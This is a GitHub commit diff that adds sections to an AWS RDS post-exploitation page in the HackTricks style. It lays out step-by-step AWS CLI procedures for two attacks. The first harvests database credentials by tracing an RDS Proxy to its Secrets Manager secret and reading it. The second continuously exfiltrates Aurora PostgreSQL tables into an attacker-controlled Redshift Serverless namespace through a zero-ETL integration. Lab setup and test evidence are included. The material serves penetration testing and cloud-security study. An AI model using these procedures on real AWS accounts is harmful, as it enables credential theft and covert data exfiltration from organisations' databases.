Skip to content

Commit 6dd86b2

Browse files
committed
rds post recheck
1 parent 95302db commit 6dd86b2

File tree

1 file changed

+185
-2
lines changed

1 file changed

+185
-2
lines changed

src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md

Lines changed: 185 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -174,8 +174,6 @@ aws rds stop-db-instance-automated-backups-replication \
174174
</details>
175175

176176

177-
{{#include ../../../banners/hacktricks-training.md}}
178-
179177
### Enable full SQL logging via DB parameter groups and exfiltrate via RDS log APIs
180178

181179
Abuse `rds:ModifyDBParameterGroup` with RDS log download APIs to capture all SQL statements executed by applications (no DB engine credentials needed). Enable engine SQL logging and pull the file logs via `rds:DescribeDBLogFiles` and `rds:DownloadDBLogFilePortion` (or the REST `downloadCompleteLogFile`). Useful to collect queries that may contain secrets/PII/JWTs.
@@ -455,3 +453,188 @@ Notes:
455453
- If multi-statement SQL is rejected by rds-data, issue separate execute-statement calls.
456454
- For engines where modify-db-cluster --enable-http-endpoint has no effect, use rds enable-http-endpoint --resource-arn.
457455
- Ensure the engine/version actually supports the Data API; otherwise HttpEndpointEnabled will remain False.
456+
457+
458+
### Harvest DB credentials via RDS Proxy auth secrets (`rds:DescribeDBProxies` + `secretsmanager:GetSecretValue`)
459+
460+
Abuse RDS Proxy configuration to discover the Secrets Manager secret used for backend authentication, then read the secret to obtain database credentials. Many environments grant broad `secretsmanager:GetSecretValue`, making this a low-friction pivot to DB creds. If the secret uses a CMK, mis-scoped KMS permissions may also allow `kms:Decrypt`.
461+
462+
Permissions needed (minimum):
463+
- `rds:DescribeDBProxies`
464+
- `secretsmanager:GetSecretValue` on the referenced SecretArn
465+
- Optional when the secret uses a CMK: `kms:Decrypt` on that key
466+
467+
Impact: Immediate disclosure of DB username/password configured on the proxy; enables direct DB access or further lateral movement.
468+
469+
Steps
470+
```bash
471+
# 1) Enumerate proxies and extract the SecretArn used for auth
472+
aws rds describe-db-proxies \
473+
--query DBProxies[*].[DBProxyName,Auth[0].AuthScheme,Auth[0].SecretArn] \
474+
--output table
475+
476+
# 2) Read the secret value (common over-permission)
477+
aws secretsmanager get-secret-value \
478+
--secret-id <SecretArnFromProxy> \
479+
--query SecretString --output text
480+
# Example output: {"username":"admin","password":"S3cr3t!"}
481+
```
482+
483+
Lab (minimal to reproduce)
484+
```bash
485+
REGION=us-east-1
486+
ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
487+
SECRET_ARN=$(aws secretsmanager create-secret \
488+
--region $REGION --name rds/proxy/aurora-demo \
489+
--secret-string username:admin \
490+
--query ARN --output text)
491+
aws iam create-role --role-name rds-proxy-secret-role \
492+
--assume-role-policy-document Version:2012-10-17
493+
aws iam attach-role-policy --role-name rds-proxy-secret-role \
494+
--policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite
495+
aws rds create-db-proxy --db-proxy-name p0 --engine-family MYSQL \
496+
--auth [AuthScheme:SECRETS] \
497+
--role-arn arn:aws:iam::$ACCOUNT_ID:role/rds-proxy-secret-role \
498+
--vpc-subnet-ids $(aws ec2 describe-subnets --filters Name=default-for-az,Values=true --query Subnets[].SubnetId --output text)
499+
aws rds wait db-proxy-available --db-proxy-name p0
500+
# Now run the enumeration + secret read from the Steps above
501+
```
502+
503+
Cleanup (lab)
504+
```bash
505+
aws rds delete-db-proxy --db-proxy-name p0
506+
aws iam detach-role-policy --role-name rds-proxy-secret-role --policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite
507+
aws iam delete-role --role-name rds-proxy-secret-role
508+
aws secretsmanager delete-secret --secret-id rds/proxy/aurora-demo --force-delete-without-recovery
509+
```
510+
511+
### Stealthy continuous exfiltration via Aurora zero‑ETL to Amazon Redshift (rds:CreateIntegration)
512+
513+
Abuse Aurora PostgreSQL zero‑ETL integration to continuously replicate production data into a Redshift Serverless namespace you control. With a permissive Redshift resource policy that authorizes CreateInboundIntegration/AuthorizeInboundIntegration for a specific Aurora cluster ARN, an attacker can establish a near‑real‑time data copy without DB creds, snapshots or network exposure.
514+
515+
Permissions needed (minimum):
516+
- `rds:CreateIntegration`, `rds:DescribeIntegrations`, `rds:DeleteIntegration`
517+
- `redshift:PutResourcePolicy`, `redshift:DescribeInboundIntegrations`, `redshift:DescribeIntegrations`
518+
- `redshift-data:ExecuteStatement/GetStatementResult/ListDatabases` (to query)
519+
- `rds-data:ExecuteStatement` (optional; to seed data if needed)
520+
521+
Tested on: us-east-1, Aurora PostgreSQL 16.4 (Serverless v2), Redshift Serverless.
522+
523+
<details>
524+
<summary>1) Create Redshift Serverless namespace + workgroup</summary>
525+
526+
```bash
527+
REGION=us-east-1
528+
RS_NS_ARN=$(aws redshift-serverless create-namespace --region $REGION --namespace-name ztl-ns \
529+
--admin-username adminuser --admin-user-password 'AdminPwd-1!' \
530+
--query namespace.namespaceArn --output text)
531+
RS_WG_ARN=$(aws redshift-serverless create-workgroup --region $REGION --workgroup-name ztl-wg \
532+
--namespace-name ztl-ns --base-capacity 8 --publicly-accessible \
533+
--query workgroup.workgroupArn --output text)
534+
# Wait until AVAILABLE, then enable case sensitivity (required for PostgreSQL)
535+
aws redshift-serverless update-workgroup --region $REGION --workgroup-name ztl-wg \
536+
--config-parameters parameterKey=enable_case_sensitive_identifier,parameterValue=true
537+
```
538+
</details>
539+
540+
<details>
541+
<summary>2) Configure Redshift resource policy to allow the Aurora source</summary>
542+
543+
```bash
544+
ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
545+
SRC_ARN=<AURORA_CLUSTER_ARN>
546+
cat > rs-rp.json <<JSON
547+
{
548+
"Version": "2012-10-17",
549+
"Statement": [
550+
{
551+
"Sid": "AuthorizeInboundByRedshiftService",
552+
"Effect": "Allow",
553+
"Principal": {"Service": "redshift.amazonaws.com"},
554+
"Action": "redshift:AuthorizeInboundIntegration",
555+
"Resource": "$RS_NS_ARN",
556+
"Condition": {"StringEquals": {"aws:SourceArn": "$SRC_ARN"}}
557+
},
558+
{
559+
"Sid": "AllowCreateInboundFromAccount",
560+
"Effect": "Allow",
561+
"Principal": {"AWS": "arn:aws:iam::$ACCOUNT_ID:root"},
562+
"Action": "redshift:CreateInboundIntegration",
563+
"Resource": "$RS_NS_ARN"
564+
}
565+
]
566+
}
567+
JSON
568+
aws redshift put-resource-policy --region $REGION --resource-arn "$RS_NS_ARN" --policy file://rs-rp.json
569+
```
570+
</details>
571+
572+
<details>
573+
<summary>3) Create Aurora PostgreSQL cluster (enable Data API and logical replication)</summary>
574+
575+
```bash
576+
CLUSTER_ID=aurora-ztl
577+
aws rds create-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
578+
--engine aurora-postgresql --engine-version 16.4 \
579+
--master-username postgres --master-user-password 'InitPwd-1!' \
580+
--enable-http-endpoint --no-deletion-protection --backup-retention-period 1
581+
aws rds wait db-cluster-available --region $REGION --db-cluster-identifier $CLUSTER_ID
582+
# Serverless v2 instance
583+
aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
584+
--serverless-v2-scaling-configuration MinCapacity=0.5,MaxCapacity=1 --apply-immediately
585+
aws rds create-db-instance --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1 \
586+
--db-instance-class db.serverless --engine aurora-postgresql --db-cluster-identifier $CLUSTER_ID
587+
aws rds wait db-instance-available --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1
588+
# Cluster parameter group for zero‑ETL
589+
aws rds create-db-cluster-parameter-group --region $REGION --db-cluster-parameter-group-name apg16-ztl-zerodg \
590+
--db-parameter-group-family aurora-postgresql16 --description "APG16 zero-ETL params"
591+
aws rds modify-db-cluster-parameter-group --region $REGION --db-cluster-parameter-group-name apg16-ztl-zerodg --parameters \
592+
ParameterName=rds.logical_replication,ParameterValue=1,ApplyMethod=pending-reboot \
593+
ParameterName=aurora.enhanced_logical_replication,ParameterValue=1,ApplyMethod=pending-reboot \
594+
ParameterName=aurora.logical_replication_backup,ParameterValue=0,ApplyMethod=pending-reboot \
595+
ParameterName=aurora.logical_replication_globaldb,ParameterValue=0,ApplyMethod=pending-reboot
596+
aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
597+
--db-cluster-parameter-group-name apg16-ztl-zerodg --apply-immediately
598+
aws rds reboot-db-instance --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1
599+
aws rds wait db-instance-available --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1
600+
SRC_ARN=$(aws rds describe-db-clusters --region $REGION --db-cluster-identifier $CLUSTER_ID --query 'DBClusters[0].DBClusterArn' --output text)
601+
```
602+
</details>
603+
604+
<details>
605+
<summary>4) Create the zero‑ETL integration from RDS</summary>
606+
607+
```bash
608+
# Include all tables in the default 'postgres' database
609+
aws rds create-integration --region $REGION --source-arn "$SRC_ARN" \
610+
--target-arn "$RS_NS_ARN" --integration-name ztl-demo \
611+
--data-filter 'include: postgres.*.*'
612+
# Redshift inbound integration should become ACTIVE
613+
aws redshift describe-inbound-integrations --region $REGION --target-arn "$RS_NS_ARN"
614+
```
615+
</details>
616+
617+
<details>
618+
<summary>5) Materialize and query replicated data in Redshift</summary>
619+
620+
```bash
621+
# Create a Redshift database from the inbound integration (use integration_id from SVV_INTEGRATION)
622+
aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database dev \
623+
--sql "select integration_id from svv_integration" # take the GUID value
624+
aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database dev \
625+
--sql "create database ztl_db from integration '<integration_id>' database postgres"
626+
# List tables replicated
627+
aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database ztl_db \
628+
--sql "select table_schema,table_name from information_schema.tables where table_schema not in ('pg_catalog','information_schema') order by 1,2 limit 20;"
629+
```
630+
</details>
631+
632+
Evidence observed in test:
633+
- redshift describe-inbound-integrations: Status ACTIVE for Integration arn:...377a462b-...
634+
- SVV_INTEGRATION showed integration_id 377a462b-c42c-4f08-937b-77fe75d98211 and state PendingDbConnectState prior to DB creation.
635+
- After CREATE DATABASE FROM INTEGRATION, listing tables revealed schema ztl and table customers; selecting from ztl.customers returned 2 rows (Alice, Bob).
636+
637+
Impact: Continuous near‑real‑time exfiltration of selected Aurora PostgreSQL tables into Redshift Serverless controlled by the attacker, without using database credentials, backups, or network access to the source cluster.
638+
639+
640+
{{#include ../../../banners/hacktricks-training.md}}

0 commit comments

Comments
 (0)